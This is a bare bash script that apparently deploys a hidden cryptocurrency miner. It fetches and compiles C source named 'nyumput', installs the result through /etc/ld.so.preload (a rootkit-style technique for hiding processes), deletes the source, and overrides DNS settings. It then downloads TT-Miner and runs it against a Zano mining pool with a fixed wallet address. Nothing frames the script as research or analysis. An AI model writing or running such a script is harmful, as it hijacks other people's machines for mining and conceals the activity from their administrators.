#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/kartolo92/koplok/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
wget https://github.com/TrailingStop/TT-Miner-release/releases/download/2024.3.2/TT-Miner-2024.3.2.tar.gz
tar xvf TT-Miner-2024.3.2.tar.gz
cd TT-Miner-2024.3.2
chmod +x TT-Miner
./TT-Miner -a ProgPowZ -o stratum+tcp://us.zano.herominers.com:1110 -u ZxCrsFGnUSJ2xoGtycdk3bLHsBZ4FECJPAyccaKVvik7KcmYwX9qiBdcCtEUiJ7NseXT6bYEKtQ9zZHQJJgiGm8g2vmdEeuMd.$(echo $(shuf -i 1000-9999 -n 1)-TETE) -p x
